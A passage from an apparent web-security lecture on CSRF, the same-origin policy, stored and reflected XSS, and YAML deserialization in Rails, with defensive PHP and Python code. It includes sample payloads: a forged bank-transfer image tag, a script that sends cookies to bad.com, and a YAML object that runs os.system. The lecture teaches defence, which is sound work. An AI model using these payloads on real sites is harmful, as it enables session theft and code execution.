session cookies. For the request to come from the browser, the user must be tricked into clicking a link while logged into a sensitive site. In the previous depiction, this happened when visiting a malicious site, which issued a request to a URL embedded in an image tag. The user could also be tricked into clicking a link in a spam email, which will then get sent by the browser; the link could be disguised, for example by email formatting, to look benign. CSRF works because certain sorts of requests to the vulnerable site have the same structure, minus the session information. Let's look into this in more detail.
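For instance, the page returned by attacker.com might contain something like the following. The bank's URL and parameter names are made up for illustration; any state-changing GET request with a guessable structure would do.

    <!-- Served by attacker.com. The browser fetches the "image" automatically,
         attaching the user's bank.com session cookie to the request. -->
    <img src="http://bank.com/transfer.php?amount=1000&to=attacker"
         width="1" height="1">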
So, how can we protect against CSRF attacks? One way is to pay attention to the Referer field that's set by the browser when it sends an HTTP request to the server. Recall the request we saw in the example earlier in this unit, where we clicked a link on the reddit.com site: there the Referer was filled in with the original page on which that link resided. What a server could do when it receives a request, especially a sensitive one, is check that the Referer field only includes URLs for that site, or from a trusted location from which the link could have been generated. In our example, the Referer would be attacker.com, which should not be among the allowed locations, and so the request would be rejected. In other words, only the pages a user could legitimately come from should be allowed as Referer values. The problem here is that the Referer field is optional; not all browsers send it along. One way to deal with this is to use what's called lenient referer checking: block requests with a bad Referer, for example attacker.com in our prior example, but allow requests with no Referer at all, for example because the browser just doesn't include it. So then the question is, is a missing Referer always harmless, assuming that the browser is legitimate? Unfortunately, the answer is no. Attackers can be clever in sending redirect requests and other protocol messages that cause the Referer to be removed. For example, an attacker can bounce a user off an FTP page that the attacker controls, and the resulting request will not include a Referer header. The attacker could also exploit a browser vulnerability and hack the browser not to include the Referer field, or could mangle the web request in transit by snooping on the link. Another approach is to add secrets to links. The idea here is similar to hidden form fields, where we used capabilities: the hidden form field will include a secret that the attacker has a difficult time guessing. Recall that the attacker relies on the cookie already being present in the user's browser, so that when the request to the remote site is initiated, the cookie goes along with it. But the attacker does not know what the contents of the cookie are, and it doesn't know what is expected on the page that would normally generate such requests. So if in that page we can embed a secret that the attacker wouldn't know, and the server only allows the request if that secret is included, say as a hidden form field, then we protect against the attack we saw before, that is, attacks initiated indirectly from a remote site. We can even make the secret equal to the value in the session cookie because, as I said before, the attacker has no way to see the cookie; the attacker can only cause the request to go out, without knowing exactly what that request contains. Web frameworks help here. For example, Ruby on Rails is a web framework that makes it easy to write multi-tier web applications, and Rails automatically embeds such secrets in the links it generates for the web pages of the sites it produces.
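Here is a minimal PHP sketch of that idea, using a hidden anti-CSRF token. The token storage and the transfer handler are assumptions for illustration, not code from the lecture.

    <?php
      // --- When generating the sensitive form: embed a secret the attacker
      // --- has no way to see or guess.
      session_start();
      if (!isset($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
      }
      echo '<form action="transfer.php" method="POST">'
         . '<input type="hidden" name="csrf_token" value="' . $_SESSION['csrf_token'] . '">'
         . '<input type="text" name="amount">'
         . '<input type="submit" value="Transfer">'
         . '</form>';
    ?>

    <?php
      // --- In transfer.php, when processing the request: refuse to act unless
      // --- the secret came back and matches the one stored for this session.
      session_start();
      if (!isset($_POST['csrf_token']) ||
          $_POST['csrf_token'] !== $_SESSION['csrf_token']) {
        die("Request rejected");
      }
      do_transfer($_POST['amount']);   // hypothetical helper
    ?>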
Web 2.0
So far we've seen that the server produces static or dynamic HTML that it sends to the browser to render. Recall that static HTML is unchanged from request to request, whereas dynamic HTML is generated at the server, for example by running a PHP program that may query a database. Either way, HTML pages may contain programs written in a language called JavaScript, and these programs execute at the client, performing further rendering and content production on the page. Here's a little example of an HTML file that might be sent to the client. You can see it has the standard tags, and it also has script tags that indicate the beginning and end of a JavaScript program. Here the program sets two local variables, a and b, and then invokes document.write to modify the contents of the page. The contents of the page will include "world", the value 3, which is the sum a plus b, and then a closing boldface tag, which closes off the opening boldface tag that was at the top. When this program is rendered by the browser, it looks like this on the page. JavaScript is a programming language whose programs, called scripts, implement the client-side portions of a web application. These programs run in the browser and therefore make the web experience more interactive. In fact, the web experience is so much better when using JavaScript that people mark the point at which JavaScript came into heavy use as Web 2.0. JavaScript programs are executed in the browser and, as just shown, can be used to alter a web page's contents and determine what is displayed. To access page elements, JavaScript programs use the document object model, or DOM. JavaScript programs can also perform interactive processing: for example, they can track mouse movements to implement drag and drop, or run code to process button clicks. In addition to being used to update a page, event handlers can be used to issue web requests and to read the replies. Requests can be issued asynchronously, leading to a programming pattern called AJAX, an acronym for asynchronous JavaScript and XML. It first saw use in the early 2000s and then saw widespread deployment in Google Mail and Google Maps in 2004 and 2005; these web applications for email and maps were far more responsive than their Web 1.0 counterparts. Finally, the part of JavaScript most relevant to our discussion is that programs can read and modify cookies. JavaScript is a powerful programming language with access to sensitive resources maintained by the browser, and therefore the browser needs to enforce a security policy with respect to what JavaScript programs can do. In particular, if I use my browser to visit bank.com to do my banking, but I also use it to visit attacker.com, I don't want attacker.com's JavaScript programs to be able to access my bank data. How might they do this? Without security protection, a script from attacker.com could run and alter the layout of bank.com's website, which might, say, be open in another browser window. It could intercept keystroke events to sniff the user's password to bank.com. And since JavaScript programs can read cookies, it could read the cookies stored by bank.com; if those cookies include session identifiers, then the attacker.com script could issue web requests as if they were from the authenticated user. To avoid these problems, browsers implement the so-called same origin policy, or SOP. The browser associates the elements of a web page, including its layout, cookies, events, and so on, with an origin.
The origin is primarily defined by the hostname that the web page originated from, for example bank.com. The same origin policy states that a web page's elements can only be accessed by scripts whose origin is the same as the page's. So, to be clear, according to the same origin policy, JavaScript programs are limited in which cookies they can access. Here we see a cookie that was set and stored into the cookie cache, and according to the rules, its value should only be reachable from domains ending in .zdnet.com; that is the origin of the cookie. We can see this in the Domain part of the Set-Cookie header shown at the top. Any JavaScript program whose origin is different from zdnet.com will not have access to that cookie.
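As a small, hedged illustration (the cookie values are hypothetical), a script embedded in a page served from zdnet.com can read that site's cookies through the DOM, while the same code in a page from a different origin sees only that other origin's cookies:

    <!-- A page served from http://www.zdnet.com/ -->
    <script>
      // This script's origin is zdnet.com, so it can read zdnet.com's cookies,
      // e.g. "edition=US; session=abc123" (hypothetical values).
      console.log(document.cookie);
    </script>

    <!-- The identical script served from a page on attacker.com has a different
         origin: there, document.cookie returns attacker.com's own cookies, and
         the zdnet.com values above are not accessible to it. -->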
Cross-site Scripting
To work around the same origin policy, attackers can try to inject code using an attack called cross-site scripting. Unfortunately, this attack is quite common. For example, here is a CERT advisory about Huawei modems. Notice that it says the broadband modems include a web interface, and this web interface is vulnerable to a cross-site scripting attack. A cross-site scripting, or XSS, attack aims to subvert the same origin policy. In particular, an attacker constructs a malicious script and tries to trick the user's browser into running it as if the script came from a trusted origin. Doing so gives the script access to the sensitive content and pages from that origin. A cross-site scripting attack works by fooling the victim's site into sending the script to the user's browser, which will run it with the full privileges of the victim. Let's see how this can be achieved. There are two types of cross-site scripting attack. The first is called stored, or persistent, cross-site scripting. In this attack, the attacker leaves their script on the vulnerable web server, for example bank.com. The server will later unwittingly send that script to your browser, and your browser, none the wiser, will execute it within the same origin as the bank.com server. Visualized, it looks like this. We have the bad website, bad.com, and we have the vulnerable website, bank.com. Step one: bad.com injects a malicious script into the bank.com website. Step two: a client connects to the bank.com site, and bank.com unwittingly sends the malicious script along with its content back to the client's browser. The client's browser will then execute that malicious script as though the bank website intended to provide it. As a result, that script can do nefarious things, like perform attacker actions, such as initiating a bank transfer, or steal secret data, like the document's cookies, and send it back to the bad.com site. So in summary, the target is a user with a JavaScript-enabled browser who visits a page with user-influenced content, that is, a page whose content can be influenced by prior interactions with users. The attack goal is to run a script in the user's browser with the same access provided to the server's regular scripts, and in this way subvert the same origin policy. To do this, the attacker needs the ability to leave content on the web server, for example using an ordinary browser; the attacker might also have a website of their own to collect stolen information. The key trick here is that the server fails to ensure that content uploaded to its pages does not contain embedded scripts. Let's look at an example of a cross-site scripting attack: the Samy MySpace worm. MySpace was a social networking site, very popular prior to the rise of Facebook, that allowed people to create custom web pages. Samy embedded JavaScript in his MySpace page. MySpace attempted to filter such scripts, but in this case it failed. As a result, users who visited Samy's page ran the program, which made them friends with Samy, displayed "but most of all, Samy is my hero" on their profile, and installed the program in their profile, so that any new user who viewed the profile got infected as well. In the end, Samy went from 73 friends to one million friends in 20 hours, and took MySpace down for a weekend to boot. The second type of cross-site scripting attack is called reflected cross-site scripting. Here, the attacker gets you to send the bank.com server a URL that includes some JavaScript code in it.
The second type of cross-site scripting attack is called reflected cross-site scripting. Here, the attacker gets you to send the bank.com server a URL that includes some JavaScript code in it. The bank.com site will echo some or all of that script back to you in its response, and your browser, none the wiser, will execute the script in the response with the same origin as bank.com. Visualized, it looks like this. The browser visits bad.com, the nefarious website, which sends back a malicious page. The client then clicks on a link on that malicious page, which takes it to bank.com; the link contains some JavaScript code. Bank.com then echoes the link back in its response to the user, and the browser executes the script as though the server meant to provide it. Once again, the attacker can perform nefarious actions as a result.

So the key here is echoed input. Reflected cross-site scripting attacks need to find instances of otherwise-good web servers that echo user input back in the HTML response. For example, here is an input from bad.com where the search term is set to socks. When this goes to victim.com and the results come back, notice that socks is included in the body. The problem arises when that input includes a script. Here is an example script included in the URL: if it is not filtered out, it will be included in the body returned from victim.com, and the JavaScript interpreter running in the user's browser will execute the script rather than simply print it out. And, of course, the script will execute within victim.com's origin.

To summarize, a reflected XSS attack targets someone who is using a JavaScript-enabled browser to access a vulnerable web service. The service's vulnerability is that it echoes back part of the URLs it receives in its output responses. The attacker's goal is to run the attacker's script as if it had the origin of the victim site. The attacker does this by getting a user to click on a URL that contains JavaScript code; this code is then reflected in the server's response to the browser, and so the browser runs the script as if it came from the origin server. The key here is that the origin server reflects the attacker's script unchanged. This indifferent reflection of the input points to the proper defense: validate the input. In particular, the vulnerable server should either check or sanitize input from untrusted sources.
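As a sketch of both the echo and the fix, here is a hypothetical Python handler for a search page. The function and parameter names are mine, not from any real site; the point is that a single escaping step is the difference between reflecting a live script and reflecting harmless text.

```python
import html

def search_results_vulnerable(query):
    # The query string from the URL is echoed straight into the response body,
    # so a link like  ?q=<script>...</script>  comes back as live script.
    return f"<html><body>Results for: {query}</body></html>"

def search_results_safer(query):
    # Escaping the echoed input makes the browser print the "script" instead
    # of executing it.
    return f"<html><body>Results for: {html.escape(query)}</body></html>"

payload = "<script>new Image().src='https://bad.com/steal?c='+document.cookie;</script>"
print(search_results_vulnerable(payload))  # script tag appears verbatim -> executes
print(search_results_safer(payload))       # &lt;script&gt;... -> merely displayed
```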
One form of validation is sanitization. In particular, a server can remove all executable portions of untrusted, that is, user-provided, content that could appear in its HTML pages. For example, it might look for script tags and filter them out. Then, instead of running the script, the browser will end up printing it in the document. This might look a little strange, but it is harmless. Such filtering is often done in the comment sections of blogs. Commenters are permitted to provide rich content, like boldface, italics, or underlining, which they can express using various HTML tags. However, they are not permitted to include tags that would demarcate JavaScript code.

Blacklisting particular tags, like the script tag, and removing them from the input is a natural idea. The problem with it is that there are many ways to introduce JavaScript code, and you may think you have found them all when you actually haven't. For example, it turns out that you can embed JavaScript in XML-encoded content or in a cascading style sheet, that is, a CSS tag. Moreover, even if you found all of the tags that are specifically documented as allowing scripts, there may be other, browser-specific ways of specifying code. In particular, browsers have often been known to try to be helpful and render mangled input. Such permissiveness is good for making broken websites look okay to a user, but it can be exploited by a clever attacker. For example, such permissiveness was the flaw that allowed Samy to evade the MySpace filter. Internet Explorer permitted splitting the JavaScript tag into two words, "java" and "script", across two lines, even though other browsers would not interpret this as a JavaScript tag. This split tag evaded the MySpace filters.

A better validation approach is to use a whitelist. In particular, a site can allow only a small set of tags and then check that the input contains nothing else; if any other tag appears, the input is rejected. The same sort of whitelist applies to all elements of a page that could be affected by untrusted sources. Returning to our blog example, a whitelist filter could check that the URLs and other user-provided comments contain only boldface, italics, and underline tags, and no others. Or the blog could permit only a more limited language for providing comments: rather than full HTML, it could allow, say, Markdown.

One note: we have just considered two different attacks with strikingly similar names, cross-site scripting and cross-site request forgery. What the attacks have in common is that one site tries to act with the privileges of another site, hence the phrase "cross-site". XSS works by exploiting the trust a browser has in data sent to it from a legitimate website; the attacker tries to manipulate what the site sends to the browser. CSRF exploits the trust a website has in data sent from a semi-trusted browser; the attacker tries to manipulate what the browser sends to the site. In short, it's all about exploiting trust, and the right defense is to reduce that trust as much as possible, in particular by using input validation. This theme comes up again and again in web security, and indeed in distributed system security generally.

Let's finish off this unit with one more example. One popular framework for writing web applications is called Ruby on Rails. Server-side web applications are written in the Ruby programming language, and the Rails framework makes it easy for these applications to work via the web. Parameters in web requests sent to Rails applications can be Ruby objects encoded in XML, or in a format called YAML within XML. YAML is particularly desirable because it is easy to read and Ruby has good support for it. In particular, Ruby makes it easy to encode Ruby objects into YAML and, likewise, to decode YAML strings into Ruby objects. When those Ruby objects represent integers or strings or enumerated types, then the web app's behavior proceeds as we might hope. However, YAML can encode essentially any object, which it does by embedding Ruby code. Since the default YAML decoder can be used to decode arbitrary objects, it can thus decode arbitrary Ruby code, and with a little work the decoder can be made to invoke the code of the objects it has just decoded. This means that an attacker can send a carefully crafted message to any Ruby on Rails application and get it to run code on the attacker's behalf. Whoa. Once again, the problem here is accepting input without validating it. The problem is hidden from the application developers because the bug is in the Ruby on Rails framework and not in the application itself. A fix that validates the input might be to reject YAML altogether, or to reject YAML-encoded objects that embed code.
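The lecture's example is specific to Ruby on Rails, but the same deserialization pattern is easy to sketch in Python with the PyYAML library. This is an analogue of the Rails issue, not its actual code; the payload string and the printed messages are illustrative.

```python
import yaml  # PyYAML

# Attacker-controlled request body: YAML that names an arbitrary callable.
payload = '!!python/object/apply:os.system ["echo pwned"]'

# A permissive decode would construct the object -- and thereby run os.system:
#   yaml.unsafe_load(payload)   # never do this with untrusted input

# Validating the input by restricting it to plain data rejects the payload.
try:
    yaml.safe_load(payload)
except yaml.YAMLError as err:
    print("rejected untrusted object:", err)

# Ordinary data still decodes fine with the safe loader.
print(yaml.safe_load("user: joe123\nitems: [1, 2, 3]"))
```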
Of course, as with XSS, holes in the filters mean that vulnerabilities will persist. To conclude, web security introduces a plethora of vulnerabilities that application writers must guard against. All of them can be boiled down to misplaced trust. If we cannot completely trust the source of some input, then we must validate that input to make sure it cannot cause harm. When considering means of validation, checking is preferred to sanitization, and whitelisting is preferred to blacklisting. In our next unit, we will see how input validation is just one instance of a general set of principles we should follow when designing secure applications.
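To make that last preference concrete, here is a small, hypothetical Python sketch contrasting the two styles of filter for blog-style comments. The allowed tag set and the regular expressions are only for illustration; a real application should rely on a vetted HTML sanitizer or templating library rather than ad-hoc patterns.

```python
import re

ALLOWED_TAGS = {"b", "i", "u"}  # hypothetical whitelist for comment formatting

def blacklist_sanitize(text):
    # Blacklisting: strip <script> tags and hope nothing else can carry code.
    # Bypasses abound (event handlers, odd encodings, browser quirks).
    return re.sub(r"</?script[^>]*>", "", text, flags=re.IGNORECASE)

def whitelist_check(text):
    # Checking against a whitelist: reject the input outright if it contains
    # any tag that is not explicitly allowed.
    for tag in re.findall(r"</?\s*([a-zA-Z][a-zA-Z0-9]*)", text):
        if tag.lower() not in ALLOWED_TAGS:
            raise ValueError(f"disallowed tag: <{tag}>")
    return text

print(blacklist_sanitize('<img src=x onerror="alert(1)">'))  # sails through the blacklist
print(whitelist_check("<b>nice post</b>"))                   # accepted
try:
    whitelist_check('<img src=x onerror="alert(1)">')
except ValueError as err:
    print("rejected:", err)                                  # checked and refused
```

The design choice the sketch illustrates is the one the lecture ends on: rejecting input that fails a narrow check is simpler to get right than trying to transform arbitrary input into something safe.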